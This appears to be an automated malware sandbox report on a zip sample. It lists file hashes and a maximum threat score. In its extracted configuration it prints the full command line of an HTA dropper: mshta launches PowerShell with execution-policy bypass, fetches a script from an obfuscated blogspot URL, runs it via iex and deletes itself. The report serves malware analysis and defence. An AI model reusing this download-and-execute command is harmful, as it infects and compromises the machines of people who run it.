1a89f1b5beda5a861dda5d01f441263a003d9133dcec0cde57a5b2e65e96f1fe

General

Target

21818726421.zip
Size

11KB
Sample

250320-r2vhzat1cz
MD5

fa8e08857fc4486a258b9de5f3fb06eb
SHA1

55ab30dc92a2751e41c7e83fc3c831e723cae9a5
SHA256

1a89f1b5beda5a861dda5d01f441263a003d9133dcec0cde57a5b2e65e96f1fe
SHA512

37718c24cc684512aba281cc7d567eee2de9ea4b567edf6eec584fa04b551c1d6e1abbe841493bcb5f7c494860f171080526d8ca0b9a96c38033a5eb1955d3b2
SSDEEP

192:us4xWG2VYhSVslLlWkyxO6wZGMpxwfzuEHLlxFX+Mj6lXaR8ndBHxdhrpCuhEpzi:3MWG+bVqpWPO6wZMLPBHuMj6lqR8THo+

Score

10^/10

Malware Config

Extracted

Language

hta

Source

1
"C:\Windows\System32\mshta.exe" "javascript:var Skw = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://' + 'marchkala3-19-25' + '.b' + 'logspot.c' + 'om' + '/lundmurred.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], def = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ghi = new ActiveXObject(Skw[0]); ghi[Skw[1]](Skw[2], Skw[3], Skw[4], Skw[5], Skw[6]);close()"

URLs

hta.dropper

https://'

Targets

- Target
  
  68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da
- Size
  
  40KB
- MD5
  
  9cb482f484a11d1483aa39ad189b8cc3
- SHA1
  
  e8dca89bc15a02ee70af61f76c669d55af6917ec
- SHA256
  
  68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da
- SHA512
  
  6a5e6ec234f2af41846dc8447f334c3d8a067bf1834b9b92765e5c478ade25cd7c69f25660d84f1e3b1b725c31030813cee21c1f26a880d1cacb85c34c681ddc
- SSDEEP
  
  384:PhwVVcX8YbmWG3cdW0nwcP3r+8cQe1uFHwl:5xMYbWWjPCTQe1uFHwl
Score

10^/10

discovery
behavioral1 behavioral2